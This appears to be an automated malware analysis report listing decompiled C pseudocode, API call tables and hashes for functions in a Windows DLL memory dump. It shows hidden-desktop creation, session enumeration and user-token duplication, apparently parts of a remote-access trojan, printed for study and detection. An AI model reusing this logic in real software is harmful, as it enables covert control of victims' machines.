									Sleep(0xfa0);
								}
								_t14 =  *0x7098f530; // 0x0
								return CloseDesktop(_t14);
							}
						}
						return _t7;
					}
				} else {
					_push(__esi);
					__esi = StrChrW;
					_push(__edi);
					__eax = StrChrW(0x7098cad4, 0x54);
					__eax = CreateEventW(0, 1, 0, __eax);
					__edi = __eax;
					if(__edi == 0) {
						L12:
						_pop(__edi);
						_pop(__esi);
						return __eax;
					}
					if(GetLastError() == 0xb7) {
						__eax = CloseHandle(__edi);
						goto L12;
					}
					__eax = GetCurrentThreadId();
					__eax = GetThreadDesktop(__eax);
					__ebx = CloseHandle;
					 *0x7098f534 = __eax;
					if(__eax != 0) {
						__eax = StrChrW(0x7098cad4, 0x54);
						__eax = CreateDesktopW(__eax, 0, 0, 0, 0x10000000, 0);
						 *0x7098f530 = __eax;
						if(__eax != 0) {
							__eax = _v4;
							__esi = CreateThread(0, 0, E7098A180, _v4, 0, 0);
							if(__esi != 0) {
								WaitForSingleObject(__esi, 0xffffffff) = CloseHandle(__esi);
								Sleep(0xfa0);
							}
							__ecx =  *0x7098f530; // 0x0
							__eax = CloseDesktop(__ecx);
						}
					}
					__eax = CloseHandle(__edi);
					_pop(__edi);
					_pop(__esi);
					return __eax;
				}
			}












                                                                                                        0x7098a5c7
                                                                                                        0x7098a6b3
                                                                                                        0x7098a621
                                                                                                        0x7098a6b9
                                                                                                        0x7098a6b9
                                                                                                        0x7098a027
                                                                                                        0x7098a02d
                                                                                                        0x7098a034
                                                                                                        0x7098a051
                                                                                                        0x7098a057
                                                                                                        0x7098a05e
                                                                                                        0x7098a079
                                                                                                        0x7098a07d
                                                                                                        0x7098a082
                                                                                                        0x7098a089
                                                                                                        0x7098a094
                                                                                                        0x7098a094
                                                                                                        0x7098a09a
                                                                                                        0x00000000
                                                                                                        0x7098a0a7
                                                                                                        0x7098a05e
                                                                                                        0x7098a0a8
                                                                                                        0x7098a0a8
                                                                                                        0x7098a5e7
                                                                                                        0x7098a5e7
                                                                                                        0x7098a5e8
                                                                                                        0x7098a5ee
                                                                                                        0x7098a5f6
                                                                                                        0x7098a5ff
                                                                                                        0x7098a605
                                                                                                        0x7098a609
                                                                                                        0x7098a61f
                                                                                                        0x7098a61f
                                                                                                        0x7098a620
                                                                                                        0x00000000
                                                                                                        0x7098a620
                                                                                                        0x7098a616
                                                                                                        0x7098a619
                                                                                                        0x00000000
                                                                                                        0x7098a619
                                                                                                        0x7098a623
                                                                                                        0x7098a62a
                                                                                                        0x7098a630
                                                                                                        0x7098a636
                                                                                                        0x7098a63d
                                                                                                        0x7098a653
                                                                                                        0x7098a656
                                                                                                        0x7098a65c
                                                                                                        0x7098a663
                                                                                                        0x7098a665
                                                                                                        0x7098a67d
                                                                                                        0x7098a681
                                                                                                        0x7098a68d
                                                                                                        0x7098a694
                                                                                                        0x7098a694
                                                                                                        0x7098a69a
                                                                                                        0x7098a6a1
                                                                                                        0x7098a6a1
                                                                                                        0x7098a663
                                                                                                        0x7098a6a8
                                                                                                        0x7098a6ab
                                                                                                        0x7098a6ac
                                                                                                        0x7098a6ad
                                                                                                        0x7098a6ad

                                                                                                        APIs
                                                                                                        • StrChrW.SHLWAPI(7098CAD4,00000054,00000000,00000002,7098A769,00000001), ref: 7098A5F6
                                                                                                        • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 7098A5FF
                                                                                                        • GetLastError.KERNEL32 ref: 7098A60B
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 7098A619
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 7098A623
                                                                                                        • GetThreadDesktop.USER32(00000000), ref: 7098A62A
                                                                                                        • StrChrW.SHLWAPI(7098CAD4,00000054,00000000,00000000,00000000,10000000,00000000), ref: 7098A653
                                                                                                        • CreateDesktopW.USER32 ref: 7098A656
                                                                                                        • CreateThread.KERNEL32 ref: 7098A677
                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 7098A686
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 7098A68D
                                                                                                        • Sleep.KERNEL32(00000FA0), ref: 7098A694
                                                                                                        • CloseDesktop.USER32(00000000), ref: 7098A6A1
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 7098A6A8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Close$CreateDesktopHandleThread$CurrentErrorEventLastObjectSingleSleepWait
                                                                                                        • String ID:
                                                                                                        • API String ID: 2944326888-0
                                                                                                        • Opcode ID: dfaa598e95f5f178b650cb04a56bff42231b44ad4b8f0c229ff80c578c37a3c2
                                                                                                        • Instruction ID: 93febe63c2953cd138e13e0ea687fef5f58b2c96bbe71a7fde613ee45eb485e6
                                                                                                        • Opcode Fuzzy Hash: dfaa598e95f5f178b650cb04a56bff42231b44ad4b8f0c229ff80c578c37a3c2
                                                                                                        • Instruction Fuzzy Hash: B021C27366C301AFF3115B62DC9CF6E3668EB45B16F300129F602A63E4EB749841EA16
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 709812E0, Relevance: 18.1, APIs: 12, Instructions: 96filestringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 50%
                                                                                                        			E709812E0(char* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v264;
				char _v288;
				char _v300;
				intOrPtr _v304;
				char _v308;
				long _v312;
				char* _t18;
				void* _t20;
				char* _t28;
				char* _t32;
				char* _t40;
				void* _t42;
				intOrPtr _t43;
				long* _t48;

				_t18 =  &_v300;
				_push(_t18);
				_push(0xffffffff);
				_push(E709810E0);
				_push(E709810D0);
				_push(E709810A0);
				_push(E70981070);
				_push(E70981000);
				_push(E70981050);
				_push(E70981030);
				_v312 = 0;
				L7098BFB6();
				_t40 = _t18;
				_t48 =  &(( &_v312)[9]);
				if(_t40 == 0) {
					return 0;
				} else {
					_t32 = _a4;
					_t20 = CreateFileA(_t32, 0xc0000000, 3, 0, 3, 0x80, 0);
					_t42 = _t20;
					if(_t42 != 0xffffffff) {
						_push( &_v288);
						_push(_t42);
						_push(_t40);
						L7098BFB0();
						_t48 =  &(_t48[3]);
						CloseHandle(_t42);
						if(_t20 != 0) {
							_t43 = _a12;
							if(_t43 != 0) {
								_v312 = GetTickCount();
								 *0x7098f2a0 = RtlRandom( &_v312);
							}
							lstrcpyA( &_v264, _t32);
							PathRemoveFileSpecA( &_v264);
							PathAddBackslashA( &_v264);
							_push( &_v308);
							_push(0);
							_push(E70981100);
							_push(0);
							_push( &_v264);
							_v304 = _a8;
							_v308 = _t43;
							_t28 = PathFindFileNameA(_t32);
							_push(_t28);
							_push(_t40);
							L7098BFAA();
							_t48 =  &(_t48[7]);
							_v312 = _t28;
						}
					}
					_push(_t40);
					L7098BFA4();
					return _v312;
				}
			}

















                                                                                                        0x709812e8
                                                                                                        0x709812ec
                                                                                                        0x709812ed
                                                                                                        0x709812ef
                                                                                                        0x709812f4
                                                                                                        0x709812f9
                                                                                                        0x709812fe
                                                                                                        0x70981303
                                                                                                        0x70981308
                                                                                                        0x7098130f
                                                                                                        0x70981314
                                                                                                        0x70981318
                                                                                                        0x7098131d
                                                                                                        0x7098131f
                                                                                                        0x70981324
                                                                                                        0x70981411
                                                                                                        0x7098132a
                                                                                                        0x7098132b
                                                                                                        0x70981343
                                                                                                        0x70981349
                                                                                                        0x7098134e
                                                                                                        0x70981359
                                                                                                        0x7098135a
                                                                                                        0x7098135b
                                                                                                        0x7098135c
                                                                                                        0x70981361
                                                                                                        0x70981367
                                                                                                        0x70981370
                                                                                                        0x70981372
                                                                                                        0x7098137b
                                                                                                        0x70981388
                                                                                                        0x70981392
                                                                                                        0x70981392
                                                                                                        0x7098139d
                                                                                                        0x709813a8
                                                                                                        0x709813b3
                                                                                                        0x709813c4
                                                                                                        0x709813c5
                                                                                                        0x709813c7
                                                                                                        0x709813cc
                                                                                                        0x709813d2
                                                                                                        0x709813d4
                                                                                                        0x709813d8
                                                                                                        0x709813dc
                                                                                                        0x709813e2
                                                                                                        0x709813e3
                                                                                                        0x709813e4
                                                                                                        0x709813e9
                                                                                                        0x709813ec
                                                                                                        0x709813ec
                                                                                                        0x70981370
                                                                                                        0x709813f0
                                                                                                        0x709813f1
                                                                                                        0x70981406
                                                                                                        0x70981406

                                                                                                        APIs
                                                                                                        • #20.CABINET(Function_00001030,Function_00001050,Function_00001000,Function_00001070,Function_000010A0,Function_000010D0,Function_000010E0,000000FF,?), ref: 70981318
                                                                                                        • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 70981343
                                                                                                        • #21.CABINET(00000000,00000000,?), ref: 7098135C
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 70981367
                                                                                                        • GetTickCount.KERNEL32 ref: 7098137D
                                                                                                        • RtlRandom.NTDLL ref: 7098138C
                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 7098139D
                                                                                                        • PathRemoveFileSpecA.SHLWAPI(?), ref: 709813A8
                                                                                                        • PathAddBackslashA.SHLWAPI(?), ref: 709813B3
                                                                                                        • PathFindFileNameA.SHLWAPI(?,?,00000000,Function_00001100,00000000,?), ref: 709813DC
                                                                                                        • #22.CABINET(00000000,00000000), ref: 709813E4
                                                                                                        • #23.CABINET(00000000), ref: 709813F1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: FilePath$BackslashCloseCountCreateFindHandleNameRandomRemoveSpecTicklstrcpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 4034828233-0
                                                                                                        • Opcode ID: 2687fe44326256c6f683b577dcbbdf62df554a394834df2caa849e719cb9e5fa
                                                                                                        • Instruction ID: 61cdaa6f1c10b69bacbe237befb5956ebbfa88115377c6d7d488a4fa09b3c7a4
                                                                                                        • Opcode Fuzzy Hash: 2687fe44326256c6f683b577dcbbdf62df554a394834df2caa849e719cb9e5fa
                                                                                                        • Instruction Fuzzy Hash: DE31C7B2508341AFC2209F65CC84FAF7BACEBC5754F104A1DF999963D0E734A5058B93
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 709853B0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 79threadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 80%
                                                                                                        			E709853B0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v264;
				char _v272;
				intOrPtr _t11;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t27;
				char* _t28;
				void* _t33;

				_t28 =  &_v264;
				_t21 = _a12;
				_t25 = _a8;
				_t24 = 0;
				if(_t25 != 0 || _t21 != 0) {
					_t33 =  *0x7098f5bc - _t24; // 0x0
					if(_t33 != 0) {
						E70983850(StrChrW(0x7098c90c, 0x55), 0);
						_t28 =  &(_t28[8]);
					}
					if(_t25 == 0) {
						if(_t21 == 0) {
							goto L8;
						}
						goto L9;
					} else {
						_t11 =  *0x7098f62c; // 0x784250
						_push(0x52);
						_push(_t11);
						_push(StrChrA(0x7098ca94, 0x47));
						wsprintfA( &_v272, StrChrA(0x7098ca8c, 0x25));
						_t27 = OpenEventA(2, 0,  &_v264);
						if(_t27 == 0) {
							goto L10;
						} else {
							SetEvent(_t27);
							CloseHandle(_t27);
							return _t24;
						}
					}
				} else {
					L8:
					_push(0);
					_push(_a4);
					_t24 = E70985310();
					L9:
					CloseHandle(CreateThread(0, 0, 0x70982e50, 0, 0, 0));
					L10:
					return _t24;
				}
			}












                                                                                                        0x709853b0
                                                                                                        0x709853b7
                                                                                                        0x709853bf
                                                                                                        0x709853c7
                                                                                                        0x709853cb
                                                                                                        0x709853d5
                                                                                                        0x709853db
                                                                                                        0x709853ed
                                                                                                        0x709853f2
                                                                                                        0x709853f2
                                                                                                        0x709853f7
                                                                                                        0x7098545a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x709853f9
                                                                                                        0x709853f9
                                                                                                        0x70985404
                                                                                                        0x70985406
                                                                                                        0x70985410
                                                                                                        0x70985420
                                                                                                        0x70985438
                                                                                                        0x7098543c
                                                                                                        0x00000000
                                                                                                        0x7098543e
                                                                                                        0x7098543f
                                                                                                        0x70985446
                                                                                                        0x70985457
                                                                                                        0x70985457
                                                                                                        0x7098543c
                                                                                                        0x7098545c
                                                                                                        0x7098545c
                                                                                                        0x70985463
                                                                                                        0x70985465
                                                                                                        0x7098546e
                                                                                                        0x70985470
                                                                                                        0x70985486
                                                                                                        0x7098548c
                                                                                                        0x70985497
                                                                                                        0x70985497

                                                                                                        APIs
                                                                                                        • StrChrW.SHLWAPI(7098C90C,00000055,00000000), ref: 709853E6
                                                                                                        • StrChrA.SHLWAPI(7098CA94,00000047,00784250,00000052), ref: 7098540E
                                                                                                        • StrChrA.SHLWAPI(7098CA8C,00000025,00000000), ref: 70985418
                                                                                                        • wsprintfA.USER32 ref: 70985420
                                                                                                        • OpenEventA.KERNEL32(00000002,00000000,?), ref: 70985432
                                                                                                        • SetEvent.KERNEL32(00000000), ref: 7098543F
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 70985446
                                                                                                        • CreateThread.KERNEL32 ref: 7098547F
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 70985486
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: CloseEventHandle$CreateOpenThreadwsprintf
                                                                                                        • String ID: PBx
                                                                                                        • API String ID: 1587369599-258745131
                                                                                                        • Opcode ID: 26fbac7f433ce89bde961755206247da0c3497cbf1502dde79ad6fdea239bc19
                                                                                                        • Instruction ID: 355788d17e40d58613c98a11c355c9b829981899c719d16afeddaea614ed5413
                                                                                                        • Opcode Fuzzy Hash: 26fbac7f433ce89bde961755206247da0c3497cbf1502dde79ad6fdea239bc19
                                                                                                        • Instruction Fuzzy Hash: 0021D5B3B583107BD72057A58C4AF9E37689B84B12F104125FF45EB3D1DAB568098AA2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70983600, Relevance: 16.6, APIs: 11, Instructions: 134sleepCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 72%
                                                                                                        			E70983600() {
				void* _t32;
				void* _t33;
				void* _t35;
				void* _t53;
				void* _t55;
				void* _t58;
				void* _t59;
				void* _t61;
				void* _t64;
				void* _t65;

				_t59 =  *(_t65 + 0x20);
				 *(_t65 + 0x10) = 0;
				_t64 = 0;
				do {
					 *(_t65 + 0x20) = 0;
					 *(_t65 + 0x14) = 0;
					if(_t59 != 0xffffffff) {
						_push(_t65 + 0x14);
						_t32 = _t65 + 0x24;
						_push(_t32);
						_push(8);
						_push(_t59);
						_push(0);
						L7098BF80();
						if(_t32 == 0) {
							goto L14;
						} else {
							_t35 =  *(_t65 + 0x20);
							if( *_t35 == 0) {
								 *(_t65 + 0x10) = 1;
							}
							_push(_t35);
							goto L13;
						}
					} else {
						_t33 = _t65 + 0x14;
						_push(_t33);
						_push(_t65 + 0x24);
						_push(1);
						_push(0);
						_push(0);
						L7098BF86();
						if(_t33 == 0) {
							goto L14;
						} else {
							_t55 =  *(_t65 + 0x14);
							_t61 =  *(_t65 + 0x20);
							_t53 = 0;
							_t35 = _t61;
							if(_t55 <= 0) {
								L8:
								_push(_t61);
							} else {
								while( *((intOrPtr*)(_t35 + 8)) != 0) {
									_t53 = _t53 + 1;
									_t35 = _t35 + 0xc;
									if(_t53 < _t55) {
										continue;
									} else {
										_push(_t61);
									}
									goto L13;
								}
								_t59 =  *_t35;
								 *(_t65 + 0x10) = 1;
								goto L8;
							}
							L13:
							L7098BF7A();
							if( *(_t65 + 0x10) != 0) {
								_push(_t65 + 0x14);
								_push(_t59);
								 *((intOrPtr*)(_t65 + 0x1c)) = 0;
								L7098BF74();
								if(_t35 == 0) {
									break;
								} else {
									 *((intOrPtr*)(_t65 + 0x38)) = 0;
									if(DuplicateTokenEx( *(_t65 + 0x14), 0x2000000, 0, 1, 1, _t65 + 0x20) == 0) {
										break;
									} else {
										_push(4);
										_push(_t65 + 0x14);
										 *(_t65 + 0x20) = 0;
										L7098BF02();
										if(GetTokenInformation( *(_t65 + 0x20), 0x13, _t65 + 0x18, 4, _t65 + 0x18) != 0) {
											CloseHandle( *(_t65 + 0x20));
											CloseHandle( *(_t65 + 0x14));
											return  *(_t65 + 0x10);
										} else {
											_t58 =  *(_t65 + 0x20);
											 *(_t65 + 0x14) = _t58;
											CloseHandle( *(_t65 + 0x14));
											return _t58;
										}
									}
								}
							} else {
								goto L14;
							}
						}
					}
					L21:
					L14:
					Sleep(0x1f4);
					_t64 = _t64 + 1;
				} while (_t64 < 0x78);
				return 0;
				goto L21;
			}













                                                                                                        0x70983609
                                                                                                        0x7098360d
                                                                                                        0x70983611
                                                                                                        0x70983613
                                                                                                        0x70983613
                                                                                                        0x70983617
                                                                                                        0x7098361e
                                                                                                        0x70983668
                                                                                                        0x70983669
                                                                                                        0x7098366d
                                                                                                        0x7098366e
                                                                                                        0x70983670
                                                                                                        0x70983671
                                                                                                        0x70983672
                                                                                                        0x70983679
                                                                                                        0x00000000
                                                                                                        0x7098367b
                                                                                                        0x7098367b
                                                                                                        0x70983681
                                                                                                        0x70983683
                                                                                                        0x70983683
                                                                                                        0x7098368b
                                                                                                        0x00000000
                                                                                                        0x7098368b
                                                                                                        0x70983620
                                                                                                        0x70983620
                                                                                                        0x70983624
                                                                                                        0x70983629
                                                                                                        0x7098362a
                                                                                                        0x7098362c
                                                                                                        0x7098362d
                                                                                                        0x7098362e
                                                                                                        0x70983635
                                                                                                        0x00000000
                                                                                                        0x70983637
                                                                                                        0x70983637
                                                                                                        0x7098363b
                                                                                                        0x7098363f
                                                                                                        0x70983641
                                                                                                        0x70983645
                                                                                                        0x70983661
                                                                                                        0x70983661
                                                                                                        0x70983647
                                                                                                        0x70983647
                                                                                                        0x7098364c
                                                                                                        0x7098364d
                                                                                                        0x70983652
                                                                                                        0x00000000
                                                                                                        0x70983654
                                                                                                        0x70983654
                                                                                                        0x70983654
                                                                                                        0x00000000
                                                                                                        0x70983652
                                                                                                        0x70983657
                                                                                                        0x70983659
                                                                                                        0x00000000
                                                                                                        0x70983659
                                                                                                        0x7098368c
                                                                                                        0x7098368c
                                                                                                        0x70983695
                                                                                                        0x709836ba
                                                                                                        0x709836bb
                                                                                                        0x709836bc
                                                                                                        0x709836c0
                                                                                                        0x709836c7
                                                                                                        0x00000000
                                                                                                        0x709836c9
                                                                                                        0x709836dd
                                                                                                        0x709836e9
                                                                                                        0x00000000
                                                                                                        0x709836eb
                                                                                                        0x709836eb
                                                                                                        0x709836f1
                                                                                                        0x709836f2
                                                                                                        0x709836f6
                                                                                                        0x7098371c
                                                                                                        0x7098373e
                                                                                                        0x70983749
                                                                                                        0x70983754
                                                                                                        0x7098371e
                                                                                                        0x7098371e
                                                                                                        0x70983727
                                                                                                        0x7098372d
                                                                                                        0x70983738
                                                                                                        0x70983738
                                                                                                        0x7098371c
                                                                                                        0x709836e9
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70983695
                                                                                                        0x70983635
                                                                                                        0x00000000
                                                                                                        0x70983697
                                                                                                        0x7098369c
                                                                                                        0x709836a2
                                                                                                        0x709836a3
                                                                                                        0x709836b5
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • WTSEnumerateSessionsW.WTSAPI32(00000000,00000000,00000001,?,?,00000000,74B04F20,?,00000000,?,00000000,74B04F20), ref: 7098362E
                                                                                                        • WTSQuerySessionInformationW.WTSAPI32(00000000,?,00000008,?,?,00000000,74B04F20,?,00000000,?,00000000,74B04F20), ref: 70983672
                                                                                                        • WTSFreeMemory.WTSAPI32(?,00000000,?,00000008,?,?,00000000,74B04F20,?,00000000,?,00000000,74B04F20), ref: 7098368C
                                                                                                        • Sleep.KERNEL32(000001F4,00000000,?,00000008,?,?,00000000,74B04F20,?,00000000,?,00000000,74B04F20), ref: 7098369C
                                                                                                        • WTSQueryUserToken.WTSAPI32(?,?,?,00000000,?,00000008,?,?,00000000,74B04F20,?,00000000,?,00000000,74B04F20), ref: 709836C0
                                                                                                        • DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000001,00000001,?,?,?,?,00000000,?,00000008,?,?,00000000,74B04F20), ref: 709836E1
                                                                                                        • RtlZeroMemory.NTDLL(?,00000004), ref: 709836F6
                                                                                                        • GetTokenInformation.ADVAPI32(?,00000013(TokenIntegrityLevel),00000004,00000004,?,?,00000004,?,00000000,?,00000000,74B04F20), ref: 7098370E
                                                                                                        • CloseHandle.KERNEL32(?,?,00000000,?,00000000,74B04F20), ref: 7098372D
                                                                                                        • CloseHandle.KERNEL32(?,?,00000000,?,00000000,74B04F20), ref: 7098373E
                                                                                                        • CloseHandle.KERNEL32(?,?,00000000,?,00000000,74B04F20), ref: 70983749
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: CloseHandleToken$InformationMemoryQuery$DuplicateEnumerateFreeSessionSessionsSleepUserZero
                                                                                                        • String ID:
                                                                                                        • API String ID: 935900411-0
                                                                                                        • Opcode ID: 35ed1ad82b2044956dd60122e790e9b837209af13fee578bdd43b43813613b38
                                                                                                        • Instruction ID: 6a44722b9f78f330e7dc3e0aac8f24024f6b2f06b84b1107958b4c834777778f
                                                                                                        • Opcode Fuzzy Hash: 35ed1ad82b2044956dd60122e790e9b837209af13fee578bdd43b43813613b38
                                                                                                        • Instruction Fuzzy Hash: 59415FB2208341ABD700DF59DD81A5FB3E9FB88754F044A2DF64297390E774E9088BA3
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70986E50, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 80COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 87%
                                                                                                        			E70986E50(WCHAR* _a4, signed int _a8, intOrPtr _a12, signed char _a16) {
				short _v18;
				void* _v20;
				short _v22;
				short _v24;
				short _v26;
				short _v28;
				WCHAR* _t23;
				WCHAR* _t31;
				signed char _t33;
				signed int _t34;
				WCHAR* _t38;
				WCHAR* _t40;
				WCHAR* _t46;
				WCHAR* _t47;
				WCHAR* _t49;
				WCHAR* _t50;
				WCHAR* _t55;
				WCHAR* _t57;

				_t40 =  *0x7098f57c; // 0xb7ea60
				_t55 = _a4;
				_v22 = 0;
				_v24 = 0x6e;
				_t23 =  *0x7098f58c; // 0x7837d8
				_v28 = 0x640068;
				WritePrivateProfileStringW(_t23,  &_v28, _t55, _t40);
				_t49 =  *0x7098f57c; // 0xb7ea60
				_t50 =  *0x7098f58c; // 0x7837d8
				asm("sbb eax, eax");
				_v26 = 0x70;
				WritePrivateProfileStringW(_t50,  &_v28,  ~_t55 & _a8, _t49);
				_v18 = 0;
				_v26 = 0x73;
				_v20 = (0 | _a12 != 0x00000000) + 0x30;
				_t46 =  *0x7098f57c; // 0xb7ea60
				asm("sbb esi, esi");
				_t57 =  ~_t55 &  &_v20;
				_t31 =  *0x7098f58c; // 0x7837d8
				WritePrivateProfileStringW(_t31,  &_v28, _t57, _t46);
				_t33 = _a16;
				_v26 = 0x74;
				_t34 = _t33 & 0x000000ff;
				if(_t33 == 0) {
					_t34 = 0xc;
				}
				_push(_t34);
				wsprintfW( &_v24, StrChrW(0x7098cdcc, 0x25));
				_t47 =  *0x7098f57c; // 0xb7ea60
				_t38 =  *0x7098f58c; // 0x7837d8
				return WritePrivateProfileStringW(_t38,  &_v24, _t57, _t47);
			}





















                                                                                                        0x70986e53
                                                                                                        0x70986e5a
                                                                                                        0x70986e68
                                                                                                        0x70986e77
                                                                                                        0x70986e7c
                                                                                                        0x70986e83
                                                                                                        0x70986e8b
                                                                                                        0x70986e8d
                                                                                                        0x70986e98
                                                                                                        0x70986e9e
                                                                                                        0x70986ea9
                                                                                                        0x70986eb5
                                                                                                        0x70986ebf
                                                                                                        0x70986ed0
                                                                                                        0x70986ede
                                                                                                        0x70986ee3
                                                                                                        0x70986ee9
                                                                                                        0x70986eec
                                                                                                        0x70986eee
                                                                                                        0x70986ef6
                                                                                                        0x70986ef8
                                                                                                        0x70986efe
                                                                                                        0x70986f06
                                                                                                        0x70986f09
                                                                                                        0x70986f0b
                                                                                                        0x70986f0b
                                                                                                        0x70986f10
                                                                                                        0x70986f24
                                                                                                        0x70986f2a
                                                                                                        0x70986f30
                                                                                                        0x70986f47

                                                                                                        APIs
                                                                                                        • WritePrivateProfileStringW.KERNEL32 ref: 70986E8B
                                                                                                        • WritePrivateProfileStringW.KERNEL32(007837D8,?,?,00B7EA60), ref: 70986EB5
                                                                                                        • WritePrivateProfileStringW.KERNEL32(007837D8,?,?,00B7EA60), ref: 70986EF6
                                                                                                        • StrChrW.SHLWAPI(7098CDCC,00000025,?), ref: 70986F18
                                                                                                        • wsprintfW.USER32 ref: 70986F24
                                                                                                        • WritePrivateProfileStringW.KERNEL32(007837D8,?,?,00B7EA60), ref: 70986F40
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: PrivateProfileStringWrite$wsprintf
                                                                                                        • String ID: h$t
                                                                                                        • API String ID: 2965074233-520427273
                                                                                                        • Opcode ID: 2aeb8af10bccad1c49e3b1641d8110741fa45951389af1d02b4a6628353900e8
                                                                                                        • Instruction ID: bd3f2e9b173c83771bcd3303f8a0a250b1f0fe5da0907b529168fa95f41919d9
                                                                                                        • Opcode Fuzzy Hash: 2aeb8af10bccad1c49e3b1641d8110741fa45951389af1d02b4a6628353900e8
                                                                                                        • Instruction Fuzzy Hash: E7215EB6528340ABD300DF69CC54E6BB7F9EFD8740F009A2DF545C33A0E67499089BA2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70984A90, Relevance: 13.8, APIs: 9, Instructions: 250memorycomstringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 54%
                                                                                                        			E70984A90() {
				char _v8;
				char _v12;
				char _v16;
				char _v24;
				intOrPtr _v28;
				signed int _v32;
				char _v36;
				void* _v44;
				intOrPtr _v48;
				void* _v52;
				intOrPtr _v60;
				char _v64;
				intOrPtr* _v68;
				char _v76;
				intOrPtr _v80;
				void* _v84;
				WCHAR* _v92;
				intOrPtr* _v104;
				intOrPtr* _v112;
				intOrPtr* _v120;
				intOrPtr* _v128;
				intOrPtr* _v136;
				intOrPtr* _v144;
				intOrPtr* _v148;
				intOrPtr _v152;
				intOrPtr* _v160;
				char* _t80;
				intOrPtr* _t82;
				intOrPtr* _t85;
				intOrPtr* _t88;
				intOrPtr* _t92;
				intOrPtr* _t95;
				char* _t98;
				intOrPtr _t99;
				intOrPtr* _t100;
				intOrPtr* _t102;
				intOrPtr* _t104;
				intOrPtr* _t106;
				intOrPtr* _t108;
				intOrPtr* _t110;
				intOrPtr* _t112;
				intOrPtr* _t115;
				intOrPtr* _t117;
				intOrPtr* _t120;
				int _t123;
				intOrPtr* _t124;
				intOrPtr* _t126;
				WCHAR* _t128;
				intOrPtr* _t130;
				intOrPtr* _t132;
				signed int _t134;
				intOrPtr* _t138;
				intOrPtr* _t161;
				char _t185;
